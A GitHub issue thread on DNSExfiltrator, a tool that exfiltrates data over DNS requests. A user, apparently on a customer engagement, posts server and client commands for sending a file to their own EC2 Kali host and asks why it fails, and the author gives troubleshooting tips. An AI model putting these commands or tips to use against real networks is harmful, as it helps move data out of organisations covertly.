Arno0x / DNSExfiltrator

Data exfiltration over DNS request covert channel
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i am getting a message saying that my DNS name doens't exist #5

Open amehaidly opened 4 years ago

amehaidly commented 4 years ago

i am using the power shell , i have an EC2 virtual machine on amazone which is running Kali Linux and i am doing the same steps having the same domain specified in the server and the client

Server : .\ -d -p password Client : ./DNSExfiltrator.exe c:\users\root\Desktop\DNSExfiltrator-master\test1.png password s=ip of my ec2 machine t=1000

i also tried to put the domain name of the ec2 machine but it didnt recognize it.

your help will be highly apprecaited as i have an exfiltration at a customer site and i need to use this tool

Best Regards

abdazahran commented 4 years ago

+1, its the same for me "DNS name doesn't exist", any idea on the solution or this is a bug?

Arno0x commented 4 years ago


You don't necessarily have to set the "s=ip of your ec2 machine" since the client machine might not be able to reach your server directly.

Try to just remove this parameter so that the client uses its system wide resolver. If it still doesn't work, you could also try to use the "-b32" option which might help with some resolvers which don't allow all base64 characters.

So you have two things to give a try :-)

abdazahran commented 4 years ago

-b32 is for DoH options, however its not the case that we have. I've tried all the options you asked but with no luck. can we have a quick session together to look at this quickly, please?

luqystark commented 10 months ago

Hi, may I know if there is any solution for this bcs im facing the same issue